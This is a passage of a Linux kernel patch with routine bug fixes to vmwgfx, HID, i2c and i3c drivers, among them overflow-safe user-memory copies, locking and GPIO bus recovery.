+@@ -774,9 +774,9 @@ int vmw_surface_define_ioctl(struct drm_device *dev, void *data,
+ 	       sizeof(metadata->mip_levels));
+ 	metadata->num_sizes = num_sizes;
+ 	metadata->sizes =
+-		memdup_user((struct drm_vmw_size __user *)(unsigned long)
++		memdup_array_user((struct drm_vmw_size __user *)(unsigned long)
+ 			    req->size_addr,
+-			    sizeof(*metadata->sizes) * metadata->num_sizes);
++			    metadata->num_sizes, sizeof(*metadata->sizes));
+ 	if (IS_ERR(metadata->sizes)) {
+ 		ret = PTR_ERR(metadata->sizes);
+ 		goto out_no_sizes;
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 9a17e5cc3539b..130fc5f341422 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -365,6 +365,7 @@
+ 
+ #define USB_VENDOR_ID_DELL				0x413c
+ #define USB_DEVICE_ID_DELL_PIXART_USB_OPTICAL_MOUSE	0x301a
++#define USB_DEVICE_ID_DELL_PRO_WIRELESS_KM5221W		0x4503
+ 
+ #define USB_VENDOR_ID_DELORME		0x1163
+ #define USB_DEVICE_ID_DELORME_EARTHMATE	0x0100
+diff --git a/drivers/hid/hid-lenovo.c b/drivers/hid/hid-lenovo.c
+index 44763c0da4441..7c1b33be9d134 100644
+--- a/drivers/hid/hid-lenovo.c
++++ b/drivers/hid/hid-lenovo.c
+@@ -51,7 +51,12 @@ struct lenovo_drvdata {
+ 	int select_right;
+ 	int sensitivity;
+ 	int press_speed;
+-	u8 middlebutton_state; /* 0:Up, 1:Down (undecided), 2:Scrolling */
++	/* 0: Up
++	 * 1: Down (undecided)
++	 * 2: Scrolling
++	 * 3: Patched firmware, disable workaround
++	 */
++	u8 middlebutton_state;
+ 	bool fn_lock;
+ };
+ 
+@@ -521,6 +526,19 @@ static void lenovo_features_set_cptkbd(struct hid_device *hdev)
+ 	int ret;
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
++	/*
++	 * Tell the keyboard a driver understands it, and turn F7, F9, F11 into
++	 * regular keys
++	 */
++	ret = lenovo_send_cmd_cptkbd(hdev, 0x01, 0x03);
++	if (ret)
++		hid_warn(hdev, "Failed to switch F7/9/11 mode: %d\n", ret);
++
++	/* Switch middle button to native mode */
++	ret = lenovo_send_cmd_cptkbd(hdev, 0x09, 0x01);
++	if (ret)
++		hid_warn(hdev, "Failed to switch middle button: %d\n", ret);
++
+ 	ret = lenovo_send_cmd_cptkbd(hdev, 0x05, cptkbd_data->fn_lock);
+ 	if (ret)
+ 		hid_err(hdev, "Fn-lock setting failed: %d\n", ret);
+@@ -668,31 +686,48 @@ static int lenovo_event_cptkbd(struct hid_device *hdev,
+ {
+ 	struct lenovo_drvdata *cptkbd_data = hid_get_drvdata(hdev);
+ 
+-	/* "wheel" scroll events */
+-	if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
+-			usage->code == REL_HWHEEL)) {
+-		/* Scroll events disable middle-click event */
+-		cptkbd_data->middlebutton_state = 2;
+-		return 0;
+-	}
++	if (cptkbd_data->middlebutton_state != 3) {
++		/* REL_X and REL_Y events during middle button pressed
++		 * are only possible on patched, bug-free firmware
++		 * so set middlebutton_state to 3
++		 * to never apply workaround anymore
++		 */
++		if (cptkbd_data->middlebutton_state == 1 &&
++				usage->type == EV_REL &&
++				(usage->code == REL_X || usage->code == REL_Y)) {
++			cptkbd_data->middlebutton_state = 3;
++			/* send middle button press which was hold before */
++			input_event(field->hidinput->input,
++				EV_KEY, BTN_MIDDLE, 1);
++			input_sync(field->hidinput->input);
++		}
++
++		/* "wheel" scroll events */
++		if (usage->type == EV_REL && (usage->code == REL_WHEEL ||
++				usage->code == REL_HWHEEL)) {
++			/* Scroll events disable middle-click event */
++			cptkbd_data->middlebutton_state = 2;
++			return 0;
++		}
+ 
+-	/* Middle click events */
+-	if (usage->type == EV_KEY && usage->code == BTN_MIDDLE) {
+-		if (value == 1) {
+-			cptkbd_data->middlebutton_state = 1;
+-		} else if (value == 0) {
+-			if (cptkbd_data->middlebutton_state == 1) {
+-				/* No scrolling inbetween, send middle-click */
+-				input_event(field->hidinput->input,
+-					EV_KEY, BTN_MIDDLE, 1);
+-				input_sync(field->hidinput->input);
+-				input_event(field->hidinput->input,
+-					EV_KEY, BTN_MIDDLE, 0);
+-				input_sync(field->hidinput->input);
++		/* Middle click events */
++		if (usage->type == EV_KEY && usage->code == BTN_MIDDLE) {
++			if (value == 1) {
++				cptkbd_data->middlebutton_state = 1;
++			} else if (value == 0) {
++				if (cptkbd_data->middlebutton_state == 1) {
++					/* No scrolling inbetween, send middle-click */
++					input_event(field->hidinput->input,
++						EV_KEY, BTN_MIDDLE, 1);
++					input_sync(field->hidinput->input);
++					input_event(field->hidinput->input,
++						EV_KEY, BTN_MIDDLE, 0);
++					input_sync(field->hidinput->input);
++				}
++				cptkbd_data->middlebutton_state = 0;
+ 			}
+-			cptkbd_data->middlebutton_state = 0;
++			return 1;
+ 		}
+-		return 1;
+ 	}
+ 
+ 	if (usage->type == EV_KEY && usage->code == KEY_FN_ESC && value == 1) {
+@@ -1126,22 +1161,6 @@ static int lenovo_probe_cptkbd(struct hid_device *hdev)
+ 	}
+ 	hid_set_drvdata(hdev, cptkbd_data);
+ 
+-	/*
+-	 * Tell the keyboard a driver understands it, and turn F7, F9, F11 into
+-	 * regular keys (Compact only)
+-	 */
+-	if (hdev->product == USB_DEVICE_ID_LENOVO_CUSBKBD ||
+-	    hdev->product == USB_DEVICE_ID_LENOVO_CBTKBD) {
+-		ret = lenovo_send_cmd_cptkbd(hdev, 0x01, 0x03);
+-		if (ret)
+-			hid_warn(hdev, "Failed to switch F7/9/11 mode: %d\n", ret);
+-	}
+-
+-	/* Switch middle button to native mode */
+-	ret = lenovo_send_cmd_cptkbd(hdev, 0x09, 0x01);
+-	if (ret)
+-		hid_warn(hdev, "Failed to switch middle button: %d\n", ret);
+-
+ 	/* Set keyboard settings to known state */
+ 	cptkbd_data->middlebutton_state = 0;
+ 	cptkbd_data->fn_lock = true;
+@@ -1264,6 +1283,24 @@ err:
+ 	return ret;
+ }
+ 
++#ifdef CONFIG_PM
++static int lenovo_reset_resume(struct hid_device *hdev)
++{
++	switch (hdev->product) {
++	case USB_DEVICE_ID_LENOVO_CUSBKBD:
++	case USB_DEVICE_ID_LENOVO_TPIIUSBKBD:
++		if (hdev->type == HID_TYPE_USBMOUSE)
++			lenovo_features_set_cptkbd(hdev);
++
++		break;
++	default:
++		break;
++	}
++
++	return 0;
++}
++#endif
++
+ static void lenovo_remove_tpkbd(struct hid_device *hdev)
+ {
+ 	struct lenovo_drvdata *data_pointer = hid_get_drvdata(hdev);
+@@ -1380,6 +1417,9 @@ static struct hid_driver lenovo_driver = {
+ 	.raw_event = lenovo_raw_event,
+ 	.event = lenovo_event,
+ 	.report_fixup = lenovo_report_fixup,
++#ifdef CONFIG_PM
++	.reset_resume = lenovo_reset_resume,
++#endif
+ };
+ module_hid_driver(lenovo_driver);
+ 
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index f8f20a7c24b17..056bb32091285 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -66,6 +66,7 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_STRAFE), HID_QUIRK_NO_INIT_REPORTS | HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CREATIVELABS, USB_DEVICE_ID_CREATIVE_SB_OMNI_SURROUND_51), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DELL, USB_DEVICE_ID_DELL_PIXART_USB_OPTICAL_MOUSE), HID_QUIRK_ALWAYS_POLL },
++	{ HID_USB_DEVICE(USB_VENDOR_ID_DELL, USB_DEVICE_ID_DELL_PRO_WIRELESS_KM5221W), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DMI, USB_DEVICE_ID_DMI_ENC), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DRACAL_RAPHNET, USB_DEVICE_ID_RAPHNET_2NES2SNES), HID_QUIRK_MULTI_INPUT },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_DRACAL_RAPHNET, USB_DEVICE_ID_RAPHNET_4NES4SNES), HID_QUIRK_MULTI_INPUT },
+diff --git a/drivers/i2c/busses/i2c-designware-master.c b/drivers/i2c/busses/i2c-designware-master.c
+index 004ccb2d9f369..948d547690c64 100644
+--- a/drivers/i2c/busses/i2c-designware-master.c
++++ b/drivers/i2c/busses/i2c-designware-master.c
+@@ -456,10 +456,16 @@ i2c_dw_xfer_msg(struct dw_i2c_dev *dev)
+ 
+ 		/*
+ 		 * Because we don't know the buffer length in the
+-		 * I2C_FUNC_SMBUS_BLOCK_DATA case, we can't stop
+-		 * the transaction here.
++		 * I2C_FUNC_SMBUS_BLOCK_DATA case, we can't stop the
++		 * transaction here. Also disable the TX_EMPTY IRQ
++		 * while waiting for the data length byte to avoid the
++		 * bogus interrupts flood.
+ 		 */
+-		if (buf_len > 0 || flags & I2C_M_RECV_LEN) {
++		if (flags & I2C_M_RECV_LEN) {
++			dev->status |= STATUS_WRITE_IN_PROGRESS;
++			intr_mask &= ~DW_IC_INTR_TX_EMPTY;
++			break;
++		} else if (buf_len > 0) {
+ 			/* more bytes to be written */
+ 			dev->status |= STATUS_WRITE_IN_PROGRESS;
+ 			break;
+@@ -495,6 +501,13 @@ i2c_dw_recv_len(struct dw_i2c_dev *dev, u8 len)
+ 	msgs[dev->msg_read_idx].len = len;
+ 	msgs[dev->msg_read_idx].flags &= ~I2C_M_RECV_LEN;
+ 
++	/*
++	 * Received buffer length, re-enable TX_EMPTY interrupt
++	 * to resume the SMBUS transaction.
++	 */
++	regmap_update_bits(dev->map, DW_IC_INTR_MASK, DW_IC_INTR_TX_EMPTY,
++			   DW_IC_INTR_TX_EMPTY);
++
+ 	return len;
+ }
+ 
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index da1f6b60f9c9a..3159ffbb77a20 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -690,15 +690,11 @@ static int i801_block_transaction_byte_by_byte(struct i801_priv *priv,
+ 		return i801_check_post(priv, result ? priv->status : -ETIMEDOUT);
+ 	}
+ 
+-	for (i = 1; i <= len; i++) {
+-		if (i == len && read_write == I2C_SMBUS_READ)
+-			smbcmd |= SMBHSTCNT_LAST_BYTE;
+-		outb_p(smbcmd, SMBHSTCNT(priv));
+-
+-		if (i == 1)
+-			outb_p(inb(SMBHSTCNT(priv)) | SMBHSTCNT_START,
+-			       SMBHSTCNT(priv));
++	if (len == 1 && read_write == I2C_SMBUS_READ)
++		smbcmd |= SMBHSTCNT_LAST_BYTE;
++	outb_p(smbcmd | SMBHSTCNT_START, SMBHSTCNT(priv));
+ 
++	for (i = 1; i <= len; i++) {
+ 		status = i801_wait_byte_done(priv);
+ 		if (status)
+ 			goto exit;
+@@ -721,9 +717,12 @@ static int i801_block_transaction_byte_by_byte(struct i801_priv *priv,
+ 			data->block[0] = len;
+ 		}
+ 
+-		/* Retrieve/store value in SMBBLKDAT */
+-		if (read_write == I2C_SMBUS_READ)
++		if (read_write == I2C_SMBUS_READ) {
+ 			data->block[i] = inb_p(SMBBLKDAT(priv));
++			if (i == len - 1)
++				outb_p(smbcmd | SMBHSTCNT_LAST_BYTE, SMBHSTCNT(priv));
++		}
++
+ 		if (read_write == I2C_SMBUS_WRITE && i+1 <= len)
+ 			outb_p(data->block[i+1], SMBBLKDAT(priv));
+ 
+diff --git a/drivers/i2c/busses/i2c-pxa.c b/drivers/i2c/busses/i2c-pxa.c
+index b605b6e43cb90..ade3f0ea59551 100644
+--- a/drivers/i2c/busses/i2c-pxa.c
++++ b/drivers/i2c/busses/i2c-pxa.c
+@@ -264,6 +264,9 @@ struct pxa_i2c {
+ 	u32			hs_mask;
+ 
+ 	struct i2c_bus_recovery_info recovery;
++	struct pinctrl		*pinctrl;
++	struct pinctrl_state	*pinctrl_default;
++	struct pinctrl_state	*pinctrl_recovery;
+ };
+ 
+ #define _IBMR(i2c)	((i2c)->reg_ibmr)
+@@ -1302,12 +1305,13 @@ static void i2c_pxa_prepare_recovery(struct i2c_adapter *adap)
+ 	 */
+ 	gpiod_set_value(i2c->recovery.scl_gpiod, ibmr & IBMR_SCLS);
+ 	gpiod_set_value(i2c->recovery.sda_gpiod, ibmr & IBMR_SDAS);
++
++	WARN_ON(pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_recovery));
+ }
+ 
+ static void i2c_pxa_unprepare_recovery(struct i2c_adapter *adap)
+ {
+ 	struct pxa_i2c *i2c = adap->algo_data;
+-	struct i2c_bus_recovery_info *bri = adap->bus_recovery_info;
+ 	u32 isr;
+ 
+ 	/*
+@@ -1321,7 +1325,7 @@ static void i2c_pxa_unprepare_recovery(struct i2c_adapter *adap)
+ 		i2c_pxa_do_reset(i2c);
+ 	}
+ 
+-	WARN_ON(pinctrl_select_state(bri->pinctrl, bri->pins_default));
++	WARN_ON(pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_default));
+ 
+ 	dev_dbg(&i2c->adap.dev, "recovery: IBMR 0x%08x ISR 0x%08x\n",
+ 	        readl(_IBMR(i2c)), readl(_ISR(i2c)));
+@@ -1343,20 +1347,76 @@ static int i2c_pxa_init_recovery(struct pxa_i2c *i2c)
+ 	if (IS_ENABLED(CONFIG_I2C_PXA_SLAVE))
+ 		return 0;
+ 
+-	bri->pinctrl = devm_pinctrl_get(dev);
+-	if (PTR_ERR(bri->pinctrl) == -ENODEV) {
+-		bri->pinctrl = NULL;
++	i2c->pinctrl = devm_pinctrl_get(dev);
++	if (PTR_ERR(i2c->pinctrl) == -ENODEV)
++		i2c->pinctrl = NULL;
++	if (IS_ERR(i2c->pinctrl))
++		return PTR_ERR(i2c->pinctrl);
++
++	if (!i2c->pinctrl)
++		return 0;
++
++	i2c->pinctrl_default = pinctrl_lookup_state(i2c->pinctrl,
++						    PINCTRL_STATE_DEFAULT);
++	i2c->pinctrl_recovery = pinctrl_lookup_state(i2c->pinctrl, "recovery");
++
++	if (IS_ERR(i2c->pinctrl_default) || IS_ERR(i2c->pinctrl_recovery)) {
++		dev_info(dev, "missing pinmux recovery information: %ld %ld\n",
++			 PTR_ERR(i2c->pinctrl_default),
++			 PTR_ERR(i2c->pinctrl_recovery));
++		return 0;
++	}
++
++	/*
++	 * Claiming GPIOs can influence the pinmux state, and may glitch the
++	 * I2C bus. Do this carefully.
++	 */
++	bri->scl_gpiod = devm_gpiod_get(dev, "scl", GPIOD_OUT_HIGH_OPEN_DRAIN);
++	if (bri->scl_gpiod == ERR_PTR(-EPROBE_DEFER))
++		return -EPROBE_DEFER;
++	if (IS_ERR(bri->scl_gpiod)) {
++		dev_info(dev, "missing scl gpio recovery information: %pe\n",
++			 bri->scl_gpiod);
++		return 0;
++	}
++
++	/*
++	 * We have SCL. Pull SCL low and wait a bit so that SDA glitches
++	 * have no effect.
++	 */
++	gpiod_direction_output(bri->scl_gpiod, 0);
++	udelay(10);
++	bri->sda_gpiod = devm_gpiod_get(dev, "sda", GPIOD_OUT_HIGH_OPEN_DRAIN);
++
++	/* Wait a bit in case of a SDA glitch, and then release SCL. */
++	udelay(10);
++	gpiod_direction_output(bri->scl_gpiod, 1);
++
++	if (bri->sda_gpiod == ERR_PTR(-EPROBE_DEFER))
++		return -EPROBE_DEFER;
++
++	if (IS_ERR(bri->sda_gpiod)) {
++		dev_info(dev, "missing sda gpio recovery information: %pe\n",
++			 bri->sda_gpiod);
+ 		return 0;
+ 	}
+-	if (IS_ERR(bri->pinctrl))
+-		return PTR_ERR(bri->pinctrl);
+ 
+ 	bri->prepare_recovery = i2c_pxa_prepare_recovery;
+ 	bri->unprepare_recovery = i2c_pxa_unprepare_recovery;
++	bri->recover_bus = i2c_generic_scl_recovery;
+ 
+ 	i2c->adap.bus_recovery_info = bri;
+ 
+-	return 0;
++	/*
++	 * Claiming GPIOs can change the pinmux state, which confuses the
++	 * pinctrl since pinctrl's idea of the current setting is unaffected
++	 * by the pinmux change caused by claiming the GPIO. Work around that
++	 * by switching pinctrl to the GPIO state here. We do it this way to
++	 * avoid glitching the I2C bus.
++	 */
++	pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_recovery);
++
++	return pinctrl_select_state(i2c->pinctrl, i2c->pinctrl_default);
+ }
+ 
+ static int i2c_pxa_probe(struct platform_device *dev)
+diff --git a/drivers/i2c/busses/i2c-sun6i-p2wi.c b/drivers/i2c/busses/i2c-sun6i-p2wi.c
+index 9e3483f507ff5..f2ed13b551088 100644
+--- a/drivers/i2c/busses/i2c-sun6i-p2wi.c
++++ b/drivers/i2c/busses/i2c-sun6i-p2wi.c
+@@ -201,6 +201,11 @@ static int p2wi_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
++	if (clk_freq == 0) {
++		dev_err(dev, "clock-frequency is set to 0 in DT\n");
++		return -EINVAL;
++	}
++
+ 	if (of_get_child_count(np) > 1) {
+ 		dev_err(dev, "P2WI only supports one slave device\n");
+ 		return -EINVAL;
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 7539b0740351d..5e3976ba52650 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -916,8 +916,9 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+ struct i2c_client *
+ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *info)
+ {
+-	struct i2c_client	*client;
+-	int			status;
++	struct i2c_client *client;
++	bool need_put = false;
++	int status;
+ 
+ 	client = kzalloc(sizeof *client, GFP_KERNEL);
+ 	if (!client)
+@@ -955,7 +956,6 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 	client->dev.fwnode = info->fwnode;
+ 
+ 	device_enable_async_suspend(&client->dev);
+-	i2c_dev_set_name(adap, client, info);
+ 
+ 	if (info->swnode) {
+ 		status = device_add_software_node(&client->dev, info->swnode);
+@@ -967,6 +967,7 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 		}
+ 	}
+ 
++	i2c_dev_set_name(adap, client, info);
+ 	status = device_register(&client->dev);
+ 	if (status)
+ 		goto out_remove_swnode;
+@@ -978,6 +979,7 @@ i2c_new_client_device(struct i2c_adapter *adap, struct i2c_board_info const *inf
+ 
+ out_remove_swnode:
+ 	device_remove_software_node(&client->dev);
++	need_put = true;
+ out_err_put_of_node:
+ 	of_node_put(info->of_node);
+ out_err:
+@@ -985,7 +987,10 @@ out_err:
+ 		"Failed to register i2c client %s at 0x%02x (%d)\n",
+ 		client->name, client->addr, status);
+ out_err_silent:
+-	kfree(client);
++	if (need_put)
++		put_device(&client->dev);
++	else
++		kfree(client);
+ 	return ERR_PTR(status);
+ }
+ EXPORT_SYMBOL_GPL(i2c_new_client_device);
+diff --git a/drivers/i2c/i2c-core.h b/drivers/i2c/i2c-core.h
+index 1247e6e6e9751..05b8b8dfa9bdd 100644
+--- a/drivers/i2c/i2c-core.h
++++ b/drivers/i2c/i2c-core.h
+@@ -29,7 +29,7 @@ int i2c_dev_irq_from_resources(const struct resource *resources,
+  */
+ static inline bool i2c_in_atomic_xfer_mode(void)
+ {
+-	return system_state > SYSTEM_RUNNING && irqs_disabled();
++	return system_state > SYSTEM_RUNNING && !preemptible();
+ }
+ 
+ static inline int __i2c_lock_bus_helper(struct i2c_adapter *adap)
+diff --git a/drivers/i2c/i2c-dev.c b/drivers/i2c/i2c-dev.c
+index ab0adaa130dae..dd35f341b16fd 100644
+--- a/drivers/i2c/i2c-dev.c
++++ b/drivers/i2c/i2c-dev.c
+@@ -450,8 +450,8 @@ static long i2cdev_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ 		if (rdwr_arg.nmsgs > I2C_RDWR_IOCTL_MAX_MSGS)
+ 			return -EINVAL;
+ 
+-		rdwr_pa = memdup_user(rdwr_arg.msgs,
+-				      rdwr_arg.nmsgs * sizeof(struct i2c_msg));
++		rdwr_pa = memdup_array_user(rdwr_arg.msgs,
++					    rdwr_arg.nmsgs, sizeof(struct i2c_msg));
+ 		if (IS_ERR(rdwr_pa))
+ 			return PTR_ERR(rdwr_pa);
+ 
+diff --git a/drivers/i3c/master/i3c-master-cdns.c b/drivers/i3c/master/i3c-master-cdns.c
+index 5b37ffe5ad5be..4a49c75a9408c 100644
+--- a/drivers/i3c/master/i3c-master-cdns.c
++++ b/drivers/i3c/master/i3c-master-cdns.c
+@@ -192,7 +192,7 @@
+ #define SLV_STATUS1_HJ_DIS		BIT(18)
+ #define SLV_STATUS1_MR_DIS		BIT(17)
+ #define SLV_STATUS1_PROT_ERR		BIT(16)
+-#define SLV_STATUS1_DA(x)		(((s) & GENMASK(15, 9)) >> 9)
++#define SLV_STATUS1_DA(s)		(((s) & GENMASK(15, 9)) >> 9)
+ #define SLV_STATUS1_HAS_DA		BIT(8)
+ #define SLV_STATUS1_DDR_RX_FULL		BIT(7)
+ #define SLV_STATUS1_DDR_TX_FULL		BIT(6)
+@@ -1624,13 +1624,13 @@ static int cdns_i3c_master_probe(struct platform_device *pdev)
+ 	/* Device ID0 is reserved to describe this master. */
+ 	master->maxdevs = CONF_STATUS0_DEVS_NUM(val);
+ 	master->free_rr_slots = GENMASK(master->maxdevs, 1);
++	master->caps.ibirfifodepth = CONF_STATUS0_IBIR_DEPTH(val);
++	master->caps.cmdrfifodepth = CONF_STATUS0_CMDR_DEPTH(val);
+ 
+ 	val = readl(master->regs + CONF_STATUS1);
+ 	master->caps.cmdfifodepth = CONF_STATUS1_CMD_DEPTH(val);
+ 	master->caps.rxfifodepth = CONF_STATUS1_RX_DEPTH(val);
+ 	master->caps.txfifodepth = CONF_STATUS1_TX_DEPTH(val);
+-	master->caps.ibirfifodepth = CONF_STATUS0_IBIR_DEPTH(val);
+-	master->caps.cmdrfifodepth = CONF_STATUS0_CMDR_DEPTH(val);
+ 
+ 	spin_lock_init(&master->ibi.lock);
+ 	master->ibi.num_slots = CONF_STATUS1_IBI_HW_RES(val);
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dat_v1.c b/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
+index 97bb49ff5b53b..47b9b4d4ed3fc 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dat_v1.c
+@@ -64,15 +64,17 @@ static int hci_dat_v1_init(struct i3c_hci *hci)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	/* use a bitmap for faster free slot search */
+-	hci->DAT_data = bitmap_zalloc(hci->DAT_entries, GFP_KERNEL);
+-	if (!hci->DAT_data)
+-		return -ENOMEM;
+-
+-	/* clear them */
+-	for (dat_idx = 0; dat_idx < hci->DAT_entries; dat_idx++) {
+-		dat_w0_write(dat_idx, 0);
+-		dat_w1_write(dat_idx, 0);
++	if (!hci->DAT_data) {
++		/* use a bitmap for faster free slot search */
++		hci->DAT_data = bitmap_zalloc(hci->DAT_entries, GFP_KERNEL);
++		if (!hci->DAT_data)
++			return -ENOMEM;
++
++		/* clear them */
++		for (dat_idx = 0; dat_idx < hci->DAT_entries; dat_idx++) {
++			dat_w0_write(dat_idx, 0);
++			dat_w1_write(dat_idx, 0);
++		}
+ 	}
+ 
+ 	return 0;
+@@ -87,7 +89,13 @@ static void hci_dat_v1_cleanup(struct i3c_hci *hci)
+ static int hci_dat_v1_alloc_entry(struct i3c_hci *hci)
+ {
+ 	unsigned int dat_idx;
++	int ret;
+ 
++	if (!hci->DAT_data) {
++		ret = hci_dat_v1_init(hci);
++		if (ret)
++			return ret;
++	}
+ 	dat_idx = find_first_zero_bit(hci->DAT_data, hci->DAT_entries);
+ 	if (dat_idx >= hci->DAT_entries)
+ 		return -ENOENT;
+@@ -103,7 +111,8 @@ static void hci_dat_v1_free_entry(struct i3c_hci *hci, unsigned int dat_idx)
+ {
+ 	dat_w0_write(dat_idx, 0);
+ 	dat_w1_write(dat_idx, 0);
+-	__clear_bit(dat_idx, hci->DAT_data);
++	if (hci->DAT_data)
++		__clear_bit(dat_idx, hci->DAT_data);
+ }
+ 
+ static void hci_dat_v1_set_dynamic_addr(struct i3c_hci *hci,
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 2990ac9eaade7..71b5dbe45c45c 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -734,7 +734,7 @@ static bool hci_dma_irq_handler(struct i3c_hci *hci, unsigned int mask)
+ 	unsigned int i;
+ 	bool handled = false;
+ 
+-	for (i = 0; mask && i < 8; i++) {
++	for (i = 0; mask && i < rings->total; i++) {
+ 		struct hci_rh_data *rh;
+ 		u32 status;
+ 
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index 4eebf15f685a3..f30d457e91196 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -92,6 +92,8 @@
+ #define SVC_I3C_MINTCLR      0x094
+ #define SVC_I3C_MINTMASKED   0x098
+ #define SVC_I3C_MERRWARN     0x09C
++#define   SVC_I3C_MERRWARN_NACK BIT(2)
++#define   SVC_I3C_MERRWARN_TIMEOUT BIT(20)
+ #define SVC_I3C_MDMACTRL     0x0A0
+ #define SVC_I3C_MDATACTRL    0x0AC
+ #define   SVC_I3C_MDATACTRL_FLUSHTB BIT(0)
+@@ -168,6 +170,7 @@ struct svc_i3c_xfer {
+  * @ibi.slots: Available IBI slots
+  * @ibi.tbq_slot: To be queued IBI slot
+  * @ibi.lock: IBI lock
++ * @lock: Transfer lock, protect between IBI work thread and callbacks from master
+  */
+ struct svc_i3c_master {
+ 	struct i3c_master_controller base;
+@@ -195,6 +198,7 @@ struct svc_i3c_master {
+ 		/* Prevent races within IBI handlers */
+ 		spinlock_t lock;
+ 	} ibi;
++	struct mutex lock;
+ };
+ 
+ /**
+@@ -217,6 +221,14 @@ static bool svc_i3c_master_error(struct svc_i3c_master *master)
+ 	if (SVC_I3C_MSTATUS_ERRWARN(mstatus)) {
+ 		merrwarn = readl(master->regs + SVC_I3C_MERRWARN);
+ 		writel(merrwarn, master->regs + SVC_I3C_MERRWARN);
++
++		/* Ignore timeout error */
++		if (merrwarn & SVC_I3C_MERRWARN_TIMEOUT) {
++			dev_dbg(master->dev, "Warning condition: MSTATUS 0x%08x, MERRWARN 0x%08x\n",
++				mstatus, merrwarn);
++			return false;
++		}
++
+ 		dev_err(master->dev,
+ 			"Error condition: MSTATUS 0x%08x, MERRWARN 0x%08x\n",
+ 			mstatus, merrwarn);
+@@ -323,6 +335,7 @@ static int svc_i3c_master_handle_ibi(struct svc_i3c_master *master,
+ 	struct i3c_ibi_slot *slot;
+ 	unsigned int count;
+ 	u32 mdatactrl;
++	int ret, val;
+ 	u8 *buf;
+ 
+ 	slot = i3c_generic_ibi_get_free_slot(data->ibi_pool);
+@@ -332,6 +345,13 @@ static int svc_i3c_master_handle_ibi(struct svc_i3c_master *master,
+ 	slot->len = 0;
+ 	buf = slot->data;
+ 
++	ret = readl_relaxed_poll_timeout(master->regs + SVC_I3C_MSTATUS, val,
++						SVC_I3C_MSTATUS_COMPLETE(val), 0, 1000);
++	if (ret) {
++		dev_err(master->dev, "Timeout when polling for COMPLETE\n");
++		return ret;
++	}
++
+ 	while (SVC_I3C_MSTATUS_RXPEND(readl(master->regs + SVC_I3C_MSTATUS))  &&
+ 	       slot->len < SVC_I3C_FIFO_SIZE) {
+ 		mdatactrl = readl(master->regs + SVC_I3C_MDATACTRL);
+@@ -376,6 +396,7 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 	u32 status, val;
+ 	int ret;
+ 
++	mutex_lock(&master->lock);
+ 	/* Acknowledge the incoming interrupt with the AUTOIBI mechanism */
+ 	writel(SVC_I3C_MCTRL_REQUEST_AUTO_IBI |
+ 	       SVC_I3C_MCTRL_IBIRESP_AUTO,
+@@ -386,6 +407,7 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 					 SVC_I3C_MSTATUS_IBIWON(val), 0, 1000);
+ 	if (ret) {
+ 		dev_err(master->dev, "Timeout when polling for IBIWON\n");
++		svc_i3c_master_emit_stop(master);
+ 		goto reenable_ibis;
+ 	}
+ 
+@@ -452,12 +474,13 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 
+ reenable_ibis:
+ 	svc_i3c_master_enable_interrupts(master, SVC_I3C_MINT_SLVSTART);
++	mutex_unlock(&master->lock);
+ }
+ 
+ static irqreturn_t svc_i3c_master_irq_handler(int irq, void *dev_id)
+ {
+ 	struct svc_i3c_master *master = (struct svc_i3c_master *)dev_id;
+-	u32 active = readl(master->regs + SVC_I3C_MINTMASKED);
++	u32 active = readl(master->regs + SVC_I3C_MSTATUS);
+ 
+ 	if (!SVC_I3C_MSTATUS_SLVSTART(active))
+ 		return IRQ_NONE;
+@@ -999,6 +1022,9 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	u32 reg;
+ 	int ret;
+ 
++	/* clean SVC_I3C_MINT_IBIWON w1c bits */
